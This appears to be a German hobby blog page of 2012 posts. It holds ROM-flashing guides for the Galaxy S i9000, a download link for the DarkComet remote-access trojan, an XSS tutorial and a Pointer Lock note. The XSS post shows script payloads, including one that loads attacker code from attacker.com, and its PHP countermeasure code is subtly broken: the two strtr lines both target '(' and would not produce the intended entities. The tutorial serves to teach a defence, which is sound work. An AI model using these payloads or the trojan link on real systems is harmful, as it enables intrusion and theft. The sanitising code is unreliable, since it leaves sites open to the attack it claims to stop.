Dienstag, 24. Juli 2012

Darky ROM v.11.0 Flashen auf Galaxy S i9000 Installation Black Edition


Darky ROM Installations Anleitung fürs SGS

Darky ROM ist ein Custom-ROMs für das Samsung Galaxy S I9000.
Hier die Vorstellung und Installations-Anleitung der Version 11.0 Black Edition.




Ich hafte nicht für mögliche Schäden oder einen Garantie Entfall !!

Schritt 1:
Wenn bereits Cyanogenmod 9 installiert ist, kann Schritt 1 übersprungen werden.

Zuerst muss Cyanogenmod 9 und Darky Rom v.11.0 Black Edition heruntergeladen werden:
http://get.cm/get/3dN <<--- Cyanogenmod 9
http://bit.ly/M7y1uM <<------ Darky Rom v11 @ sourceforge.net
Die .zip Pakete dann auf der INTERNEN SD des Galaxys platzieren.

Bei bedarf Backups mit Apps wie Titanium Backup usw. machen.
Jetzt kann das Galaxy ausschalten und mit dem 3-Tastengriff
(Lauter, Home & Power Button ca. 6sec gedrückt halten) in den Recovery-Modus starten.

Dort dann bei bedarf ein Nandroid Backup erstellen:
Recovery --> Backup and Restore ---> Backup to internal SD Card (Dauert ca 3-5min).

Schritt 1.1:
Dann im Recovery Wipe Data / Factory Reset anwählen, danach Wipe Cache Partition.

Jetzt kann Cyanogenmod 9 installiert werden.
Dazu Recovery --> apply update --> install update from sd card --> (Cyanogenmod 9 zip auswählen)
und installieren.

Sollte sich das Galaxy in einer Bootschleife befinden ( Immer wieder neustart ),
dann Akku raus - Akku rein und wieder in den Recovery Modus und bei Schritt 1.1 fortsetzen.

Dann das Galaxy rebooten, das erste Mal starten kann etwas dauern. (ca 3-5min)



Schritt 2:
Jetzt das Galaxy ausschalten und mit dem 3-Tastengriff
(Lauter, Home & Power Button ca. 6sec gedrückt halten) in den Recovery-Modus starten.

Im Recovery wieder Wipe Data / Factory Reset anwählen, danach Wipe Cache Partition.
Ausserdem unter Recovery ---> Advanced den Punk Wipe Dalvik Cache anwählen.

Jetzt Darky ROM installieren:
Recovery --> apply update --> install update from sd card --> Darky ROM v11. zip Paket suchen
und installieren.

Dann das Handy neu starten!


Abschluss:

Sollte etwas nicht funktionieren, einfach wieder bei Schritt 1.1 einsteigen und noch mal versuchen.
Wenn das Handy auch nach weiterem Versuchen nicht will,
dann im Recovery Menü unter Backup and Restore ---> Restore from internal SD
das erstellte Backup auswählen. Nun sollte wieder das vorherige ROM starten...

Bei Problemen, Fragen bitte in die Kommentare schreiben.
Ich lese aber auch gerne, dass alles funktioniert hat :)
PS: Kommentare kann man auch Anonym hinterlassen !!

Viel Spaß mit Darky ROM v11.0 Black Edition !!
(c) Rechtschreibfehler sind Absicht und dienen der Unterhaltung.

CyanogenMod 10 Alpha Galaxy S i9000 Flashen Installation Anleitung CM10

Cyanogenmod 10 ist eine Custom ROM basiert auf Android Version 4.1.1 JellyBean.
Derzeit ist Cyanogenmod 10 noch in der Alpha Phase, einige Bugs oder Fehler können auftreten.

Hier vorgestellt wird der Port auf das Galaxy S, zur Verfügung gestellt auf xda-developers.com vom User "pawitp".


Offizieller Thread zum Galaxy S i9000 Port von CM10: http://bit.ly/NHZtJq

### Ich oder der ROM-Publisher übernehmen keine Haftung für Schäden an eurem Gerät. ###
### Ihr seit selbst für euer Handeln verantwortlich. ###




Für die Installation werden 2 Dateien benötigt:
http://bit.ly/MFQ4o7 -- mediafire.com -- cm-10-20120723-UNOFFICIAL-galaxysmtd.zip
http://bit.ly/Of2K70   -- mediafire.com -- gapps-jellybean-20120719-signed.zip

Herunterladen und nicht entpacken, die 2 .zip Dateien direkt auf die INTERNE SD Karte kopieren!!!



Jetzt das Galaxy ausschalten und dann ins Recovery-Menü booten ( Lauter, Home & Power - Button ca. 6sec gedrückt halten )
Sollte dann ca so aussehen: (Farben können je nach CWM Version variieren)
http://bit.ly/PUe5Hv


Schritt 1:
Wenn notwendig ein Nandroid-Backup erstellen: Recovery --> Backup and Restore --> Backup to internal SD Card (Dauert ca 5min)
Mit diesem Backup kann das alte ROM jederzeit wiederhergestellt werden.


Schritt 2:
Dann im Recovery Menü Wipe Data/Factory-Reset auswählen.
INFO: Interne und externe SD-Karte werden nicht gelöscht!
Danach Wipe Cache Partition anwählen und ausführen.


Schritt 3:
Jetzt kann das ROM installiert werden.
Dazu Recovery --> apply update from sdcard --> install zip from sdcard und die .zip datei cm-10... auswählen.


Jetzt rebooten ... es sollte der CM10 Bootloader erscheinen, das erste Mal starten kann bis zu 3-4min dauern.
Wenn etwas nicht funktioniert, einfach wieder ins Recovery und ab Schritt 2 wiederholen.
Sollte eine Bootschleife auftreten, Akku raus - Akku rein, und dann ins Recovery.


Sollte es auch nach mehreren Versuchen nicht klappen, kann das Nandroid-Backup aus dem Recovery-Modus eingespielt werden. Damit sollte das vorhergehende ROM wieder ohne Probleme funktionieren.


Schritt 4:
Sobald das Galaxy S erfolgreich gebootet hat, wieder ausschalten und in den Recovery-Modus booten
( Lauter, Home & Power - Button ca. 6sec gedrückt halten ).
Jetzt auf apply update from sdcard --> install zip from sdcard und die .zip datei gapps-jellybean... installieren.
Dann Rebooten, nun sollte man ein Google-Konto einrichten können und die Google Apps wie den Play Store benutzen können.




Hoffe es hat alles funktioniert :)
Bitte Kommentare hinterlassen, ist auch Anonym möglich !!
Greetz
(c) Rechtschreibfehler sind Absicht und dienen der Unterhaltung

DarkComet Last Version v3.5.1 Download Alternative Link

The last official Version of the DarkComet RAT (Remote Administration Tool) is v3.5.1.
www.darkcomet-rat.com is not up anymore ...

Here is an alternative Download-Link for v3.5
http://www.mediafire.com/?jwxfcagn8mynnuc

Greetz

XSS Cross Site Scripting Verhindern und Verstehen Gegenmaßnahmen

XSS oder Cross Site Scripting ist eine Angriffs Methode auf WebApps die dazu führt,
dass ein Angreifer HTML/CSS oder JavaScript Code in die Website injizieren kann.


Es gibt 2 Arten von XSS Vulnerabilities ( = Verwundbarkeiten )
- Reflected bzw Non-Persistent XSS ( = reflektiertes / nicht beständiges XSS )
- Persistent XSS ( = beständiges XSS )






Persisten XSS:

Ein Angriffsbeispiel für Persistent XSS ist die Kommentarfunktion einer Internetseite.
Wenn dort zusätzlich zum Kommentar eine JavaScript Funktion angefügt wird, wird das JavaScript jedesmal ausgeführt wenn ein Website Besucher diesen Kommentar angezeigt bekommt.


Beispiel: Kommentar schreiben: | Beispielkommentar <script>alert("XSS Erfolgreich");</script> |
Neben dem Text Beispielkommentar wird noch der HTML Tag <script> angefügt, in dem JavaScript Code ausgeführt wird. In diesem Fall wird mit alert(); eine MessageBox aufgerufen die "XSS Erfolgreich" ausgibt.


Da dieser Kommentar immer angezeigt wird wenn die Kommentar Sektion der Website aufgerufen wird, bezeichnet man dieses XSS Beispiel als Persistent also beständig.






Reflected / Non-Persistent XSS:

Als reflektiertes bzw nicht beständiges Cross Site Scripting werden Angriffe bezeichnet,
die auf einen speziell preparierten Link angewiesen sind. Dazu werden die GET-Parameter manipuliert.


Beispiel: Suche | Hallo |
Sobald man die Suche abschickt wird man weitergeleitet auf zb. example.com/search.php?suche=Hallo
Der Suchbegriff, in diesem Fall "Hallo" wird via GET-Parameter an das PHP-Script search.php übergeben.
Die Ergebnisse werden ausgegeben und über den Ergebnissen steht zb " Suchergebnisse für 'Hallo'. "
Genau hier liegt der Ansatz für Reflected XSS.


Wenn der Suchbegriff "Hallo" erweitert wird zu "Hallo<script>alert("XSS");</script>
,dann wird beim Titel "Suchergebnisse für 'Hallo'." hinter dem Suchbegriff das JavaScript gestartet.


Weil dieser XSS-Angriff nur über die URL example.com/search.php?suche=Hallo<script>alert("XSS");</script> zu erreichen ist, muss der Link zb durch Email-Spreading (Phishing Mails) verbreitet werden, damit der Angriff jemanden erreicht.




Angriffsszenarien:

In den zwei Beispielen wurde jeweils nur eine MessageBox geöffnet.
Über eine XSS-Lücke kann man aber noch einiges mehr anstellen.
Fügt man anstatt <script>alert();</script> den Code 
<script src="attacker.com/xss-script.js"></script> ein,
wird eine JavaScript-Datei vom Webserver des Angreifers geladen und ausgeführt.


In dieser kann ein Angreifer jeden beliebige JavaScript Code ausführen.
Vom ersetzen des Seiteninhalts bis zum versteckten KeyLogger/MouseLogger ist hier so einiges möglich.


XSS-Angriffe sind nur so lange aktiv bis der Besucher die Seite wechselt, weil dann das infizierte JavaScript nicht mehr ausgeführt wird. Ein Angreiffer kann aber Gegenmaßnahmen ergreifen,
sodass bei allen weiteren Link-Aufrufen das JavaScript im Hintergrund weiterläuft.






Gegenmaßnahmen:

Hier zeige ich nun wie man XSS Verhindern kann mit PHP-Beispiel Code.

Ziel ist es die HTML Tags so zu verändern, dass diese bei der Ausgabe im Browser nicht mehr als HTML interpretiert werden.
Dazu gibt es HTML Entities (Hier eine Liste: http://unicode.e-workers.de/entities.php).


Wenn man beim <script> Tag das < und > zeichen als HTML Entity speichert bzw ausgibt
( < = &lt; und > = &gt; ), interpretiert der Browser den Input nicht mehr als HTML.


In PHP gibt es dazu die Methode htmlentities().
Als Beispiel die Suche:
<?php
$suchbegriff = htmlentities($_GET["suche"]);
... 
echo "Suchergebnisse für '" . $suchbegriff . "'.";
...
?>
Dadurch wird der Suchbegriff mit Entities maskiert und entschärft.


Zusätzlich ist zu empfehlen ")" und "(" zu maskieren, um Angriffe auf Events und Link Locations zu entschärfen.
<?php
$suchbegriff = htmlentities($_GET["suche"]);
$suchbegriff = strtr($suchbegriff, "(", "&#x0028;");
$suchbegriff = strtr($suchbegriff, "(",  "&#x0029;");
?>


Grundsätzlich gilt bei jedem Input den ein User in einer WebApplication machen kann gehören die Strings maskiert um XSS zu vermeiden. Das gilt für GET & POST - Daten.


Hoffe ich konnte ein bisschen weiter helfen!
Greetz

Sonntag, 27. Mai 2012

Mouse Lock (Pointer Lock) Example Code for Google Chrome

Theres an important feature coming up for HTML5 browsers: Mouse Lock.
It's still in beta status but you can activate it in the Chrome Browser under chrome://flags/.

Without Mouse Lock you can't really design an Ego-Shooter neither any First Person Game.

A Sample Implementation of Mouse Lock with jQuery:
> Pointer Lock Example <
Only Working in Chrome!

Theres an successful Port of a Quake 3 Map with WebGL and Mouse Lock. http://media.tojicode.com/q3bsp/